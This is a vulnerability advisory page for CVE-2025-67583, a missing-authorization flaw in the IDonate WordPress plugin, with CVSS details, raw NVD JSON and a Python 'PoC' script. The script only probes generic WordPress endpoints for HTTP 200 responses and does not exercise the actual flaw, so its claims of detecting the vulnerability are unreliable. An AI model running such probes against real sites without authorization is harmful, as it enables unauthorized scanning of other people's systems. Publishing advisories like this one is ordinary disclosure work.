Security Vulnerability Report
中文
CVE-2025-67583 CVSS 5.3 MEDIUM

CVE-2025-67583

Published: 2025-12-09 16:18:36
Last Modified: 2026-04-27 18:16:45

Description

Missing Authorization vulnerability in Foysal Imran IDonate idonate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects IDonate: from n/a through <= 2.1.15.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:themeatelier:idonate:*:*:*:*:*:wordpress:*:* - VULNERABLE
IDonate <= 2.1.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67583 IDonate Plugin Authorization Bypass PoC # Description: Missing Authorization vulnerability in IDonate plugin <= 2.1.15 # CVSS: 5.3 (Medium) import requests import sys TARGET_URL = "http://target-site.com" def check_vulnerability(): """Check if target is vulnerable to CVE-2025-67583""" # Identify vulnerable endpoints (example paths) vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/idonate/v1/", "/wp-content/plugins/idonate/includes/" ] print(f"[*] Testing IDonate plugin for CVE-2025-67583") print(f"[*] Target: {TARGET_URL}") for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" try: # Test unauthorized access to admin functions response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[!] Potential vulnerability at: {url}") print(f"[!] Status Code: {response.status_code}") print(f"[!] Response Length: {len(response.text)}") else: print(f"[-] Endpoint {endpoint} returned: {response.status_code}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") print("\n[*] Note: This PoC is for educational purposes only.") print("[*] Always obtain proper authorization before testing.") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67583", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:36.120", "lastModified": "2026-04-27T18:16:44.703", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Foysal Imran IDonate idonate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects IDonate: from n/a through <= 2.1.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:themeatelier:idonate:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.1.16", "matchCriteriaId": "150FECCD-3B2E-4331-A600-6F5781FA8467"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/idonate/vulnerability/wordpress-idonate-plugin-2-1-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}